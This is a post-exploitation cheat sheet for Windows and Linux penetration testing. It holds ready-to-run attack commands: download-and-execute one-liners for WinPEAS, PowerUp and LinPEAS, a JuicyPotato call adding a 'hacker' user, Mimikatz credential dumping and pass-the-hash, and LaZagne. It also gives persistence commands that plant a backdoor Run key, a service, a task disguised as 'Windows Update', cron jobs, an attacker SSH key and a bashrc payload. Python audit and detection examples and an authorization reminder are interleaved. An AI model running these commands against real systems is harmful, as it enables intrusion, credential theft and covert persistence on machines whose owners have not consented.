# Windows Post-Exploitation

## System Information Gathering

```cmd
# System info
systeminfo
hostname
whoami
whoami /priv
whoami /groups

# Network configuration
ipconfig /all
route print
arp -a
netstat -an
```
## Windows Privilege Escalation Tools

```powershell
# WinPEAS
IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')

# PowerUp
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecks
```
## Common Windows Privilege Escalation Vectors

- Unquoted Service Paths: Exploiting service path vulnerabilities
- Service Permissions: Weak service configurations
- Registry AutoRuns: Persistent startup programs
- Token Impersonation: SeImpersonatePrivilege exploitation

```cmd
# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v "\""

# Token impersonation (JuicyPotato)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c net user hacker Password123 /add" -t *
```
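The wmic pipeline above finds candidate unquoted service paths on a single host; for a fleet-wide remediation audit the same check is easier to run over an exported service inventory. The following is an added example, not part of the original cheat sheet: it assumes a CSV produced with `Get-CimInstance Win32_Service | Select-Object Name,PathName,StartMode | Export-Csv` (the sample rows below are constructed), applies the same filters as the one-liner (auto-start services, images under C:\Windows ignored), and emits the quoted path that should replace the service's ImagePath. The function names `quoted_fix` and `find_unquoted_services` are hypothetical.

```python
import csv
import io
import re

# Constructed sample export; assumed to come from
#   Get-CimInstance Win32_Service | Select-Object Name,PathName,StartMode | Export-Csv services.csv
# (none of these rows is from a real host).
SAMPLE_SERVICES_CSV = r'''Name,PathName,StartMode
wuauserv,C:\Windows\system32\svchost.exe -k netsvcs,Auto
ExBackup,C:\Program Files\Example Corp\Backup Agent\agent.exe -svc,Auto
ExUpdate,"""C:\Program Files\Example Corp\Updater\updater.exe"" /service",Auto
LegacyTool,C:\Tools\legacy tool\legacy.exe,Manual
'''

# Heuristic: the image is everything up to the first ".exe"; the rest is arguments.
EXE_RE = re.compile(r"^(?P<exe>.*?\.exe)(?P<args>.*)$", re.IGNORECASE)


def quoted_fix(pathname):
    """Return the corrected (quoted) path if `pathname` is an unquoted image path
    containing a space, otherwise None."""
    path = pathname.strip()
    if path.startswith('"'):
        return None  # already quoted: nothing to fix
    m = EXE_RE.match(path)
    if m is None:
        return None  # not a .exe image path; this heuristic cannot assess it
    exe, args = m.group("exe"), m.group("args")
    if " " not in exe:
        return None  # no space in the image path: unambiguous, no fix needed
    return f'"{exe}"{args}'


def find_unquoted_services(csv_text, auto_only=True, skip_windows_dir=True):
    """Audit a service inventory and return the services whose ImagePath must be quoted.

    Mirrors the filters of the wmic one-liner: auto-start services only, and
    images under C:\\Windows ignored (both filters can be switched off)."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        path = row["PathName"]
        if auto_only and row["StartMode"].strip().lower() != "auto":
            continue
        if skip_windows_dir and path.lstrip('"').lower().startswith("c:\\windows\\"):
            continue
        fix = quoted_fix(path)
        if fix is not None:
            findings.append({"name": row["Name"], "pathname": path, "quoted_path": fix})
    return findings


if __name__ == "__main__":
    for f in find_unquoted_services(SAMPLE_SERVICES_CSV, auto_only=False):
        print(f"{f['name']}: set ImagePath to {f['quoted_path']}")
```

The remediation is to write the returned `quoted_path` back as the service's ImagePath value (HKLM\SYSTEM\CurrentControlSet\Services\<Name>\ImagePath) and to confirm the directories along the path are not writable by unprivileged users; the `.exe` heuristic misses services whose image has no `.exe` suffix, so treat a `None` result on such a row as "not assessed" rather than "safe".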
# Linux Post-Exploitation

## System Information Gathering

```bash
# System information
uname -a
cat /etc/*-release
hostname
whoami
id
```

## Linux Privilege Escalation Tools

```bash
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
```

## Common Linux Privilege Escalation Vectors

```bash
# SUID binaries
find / -type f -perm -4000 2>/dev/null

# Sudo privileges
sudo -l

# Cron jobs
crontab -l
cat /etc/crontab
```
# Credential Harvesting

## Mimikatz

```cmd
# Extract passwords from memory
mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Dump SAM database
mimikatz "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# Pass-the-hash
mimikatz "sekurlsa::pth /user:administrator /domain:domain.com /ntlm:hash"
```

## LaZagne

```powershell
# Run all modules
./lazagne.exe all

# Specific modules
./lazagne.exe browsers
./lazagne.exe wifi
./lazagne.exe databases
```
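Each of the `sekurlsa::` commands above has to open a handle to lsass.exe with memory-read rights, and that handle open is the event a defender can alert on. The following added example (not from the original page, nor from the Mimikatz or LaZagne projects) shows that check over constructed Sysmon Event ID 10 (ProcessAccess) records: the field names `SourceImage`, `TargetImage` and `GrantedAccess` are Sysmon's, the access-right constants are the Windows process rights, the allowlist of benign source images is an assumption to tune per environment, and the function names `describe_access` and `detect_lsass_access` are hypothetical.

```python
# Windows process access rights relevant to reading another process's memory.
PROCESS_RIGHTS = {
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
MEMORY_ACCESS_MASK = 0x0010 | 0x0020  # VM_READ | VM_WRITE: needed to lift credential material

# Images that legitimately open lsass.exe on a typical host (assumption; tune per environment,
# and prefer matching on signer or hash rather than path in production).
DEFAULT_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# Constructed Sysmon Event ID 10 records, reduced to the fields this check uses.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"SourceImage": r"C:\Users\alice\Downloads\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Users\alice\Downloads\tool.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1FFFFF"},
]


def describe_access(mask):
    """Name the rights from PROCESS_RIGHTS that are set in an access mask."""
    return [name for bit, name in PROCESS_RIGHTS.items() if mask & bit]


def detect_lsass_access(events, allowlist=DEFAULT_ALLOWLIST):
    """Return an alert for every handle to lsass.exe that carries memory-read/write
    rights and was opened by an image outside the allowlist."""
    alerts = []
    for ev in events:
        target = ev["TargetImage"].lower()
        source = ev["SourceImage"].lower()
        if not target.endswith("\\lsass.exe"):
            continue
        mask = int(ev["GrantedAccess"], 16)  # Sysmon logs the mask as a hex string
        if not mask & MEMORY_ACCESS_MASK:
            continue  # query-only handles (e.g. 0x1400) cannot read credential material
        if source in allowlist:
            continue
        alerts.append({"source": ev["SourceImage"], "granted": ev["GrantedAccess"],
                       "rights": describe_access(mask)})
    return alerts


if __name__ == "__main__":
    for a in detect_lsass_access(SAMPLE_EVENTS):
        print(f"LSASS opened by {a['source']} with {a['granted']} ({', '.join(a['rights'])})")
```

The mask 0x1010 in the sample is PROCESS_QUERY_LIMITED_INFORMATION plus PROCESS_VM_READ, the minimum a memory reader needs; alerting on the VM_READ/VM_WRITE bits rather than on exact masks keeps the rule from being bypassed by a tool requesting a slightly different set of rights. On the prevention side, running LSASS as a protected process (the RunAsPPL setting under HKLM\SYSTEM\CurrentControlSet\Control\Lsa) or enabling Credential Guard blocks the `sekurlsa::` reads that this rule detects.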
# Persistence Techniques

## Windows Persistence

```cmd
# Registry persistence
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Backdoor" /t REG_SZ /d "C:\temp\payload.exe"

# Service persistence (sc requires a space after each "option=")
sc create "Backdoor" binpath= "C:\temp\payload.exe" start= auto
sc start "Backdoor"

# Scheduled task persistence
schtasks /create /tn "Windows Update" /tr "C:\temp\payload.exe" /sc onlogon /ru "NT AUTHORITY\SYSTEM"
```
## Linux Persistence

```bash
# Cron jobs
echo "* * * * * /tmp/payload.sh" | crontab -

# SSH keys
mkdir -p /home/user/.ssh
echo "ssh-rsa AAAA...attacker-public-key" >> /home/user/.ssh/authorized_keys
chmod 600 /home/user/.ssh/authorized_keys

# Bashrc persistence
echo "/tmp/payload.sh &" >> /home/user/.bashrc
```
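The Run-key, cron, SSH-key and shell-rc mechanisms in the two persistence sections above each leave an artifact that a post-engagement cleanup check or a blue-team baseline can enumerate. This added example (not part of the original page) audits constructed samples of `reg query ...\Run` output, a crontab, a `.bashrc` and an `authorized_keys` file for the traces those techniques leave: launch paths in temp or world-writable directories, and SSH keys whose comment is not in an approved inventory. It goes slightly beyond the page by also handling `@reboot`-style cron lines and keys with an options prefix. The suspicious-directory lists and the `approved_comments` inventory are assumptions to adapt per environment, and the `audit_*` function names are hypothetical.

```python
import re

# Constructed sample artifacts (none captured from a real host).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Backdoor    REG_SZ    C:\temp\payload.exe
"""
SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
0 2 * * * /usr/local/bin/backup.sh
* * * * * /tmp/payload.sh
"""
SAMPLE_BASHRC = """\
# ~/.bashrc
export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
/tmp/payload.sh &
"""
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKeyMaterialOnlyForThisExample alice@laptop
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedKeyMaterialOnlyForThisExample attacker
"""

# Launch locations a legitimately installed autostart almost never uses (assumption; extend as needed).
WIN_SUSPICIOUS_DIRS = ("c:\\temp\\", "c:\\users\\public\\", "\\appdata\\local\\temp\\", "c:\\windows\\temp\\")
NIX_SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# "    Name    REG_SZ    Data" lines as printed by reg query.
REG_VALUE_RE = re.compile(r"^\s+(?P<name>\S.*?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.*)$")
# key type, base64 blob, optional comment; search() tolerates a leading options prefix.
SSH_KEY_RE = re.compile(r"(?P<type>(?:sk-)?(?:ssh|ecdsa)-[\w@.-]+)\s+(?P<blob>[A-Za-z0-9+/=]+)(?:\s+(?P<comment>.*))?$")


def _hits(text, needles):
    lowered = text.lower()
    return any(n in lowered for n in needles)


def audit_run_key(reg_output):
    """Flag Run-key values whose command line points into a temp or public directory."""
    return [("run-key", m["name"], m["data"].strip())
            for m in map(REG_VALUE_RE.match, reg_output.splitlines())
            if m and _hits(m["data"], WIN_SUSPICIOUS_DIRS)]


def audit_cron(crontab_text):
    """Flag cron entries (5-field and @reboot-style) whose command runs from a temp directory."""
    findings = []
    for line in crontab_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or "=" in s.split()[0]:
            continue  # blank, comment, or VAR=value line
        if s.startswith("@"):
            sched, _, cmd = s.partition(" ")
        else:
            parts = s.split(None, 5)
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        if _hits(cmd, NIX_SUSPICIOUS_DIRS):
            findings.append(("cron", sched, cmd.strip()))
    return findings


def audit_shell_rc(rc_text):
    """Flag shell start-up lines that execute something from a temp directory."""
    return [("shell-rc", f"line {n}", line.strip())
            for n, line in enumerate(rc_text.splitlines(), 1)
            if line.strip() and not line.strip().startswith("#") and _hits(line, NIX_SUSPICIOUS_DIRS)]


def audit_authorized_keys(keys_text, approved_comments):
    """Flag SSH keys whose comment is not in the approved inventory."""
    findings = []
    for line in keys_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        m = SSH_KEY_RE.search(s)
        if m is None:
            continue
        comment = (m["comment"] or "").strip()
        if comment not in approved_comments:
            findings.append(("authorized_keys", m["type"], comment or "<no comment>"))
    return findings


def audit_all():
    """Run every check over the constructed samples and return the combined findings."""
    return (audit_run_key(SAMPLE_REG_QUERY)
            + audit_cron(SAMPLE_CRONTAB)
            + audit_shell_rc(SAMPLE_BASHRC)
            + audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, {"alice@laptop"}))


if __name__ == "__main__":
    for kind, where, detail in audit_all():
        print(f"[{kind}] {where}: {detail}")
```

Path-based heuristics only catch the lazy placements shown on the page; a baseline diff of the same four artifacts against a known-good snapshot catches payloads staged in less obvious directories, and for SSH keys comparing key fingerprints rather than free-text comments is the more reliable inventory check.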
# Legal and Ethical Requirements

- Only use these techniques on authorized systems
- Document all post-exploitation activities
- Remove persistence mechanisms after testing
- Protect any harvested credentials securely
- Report findings through proper channels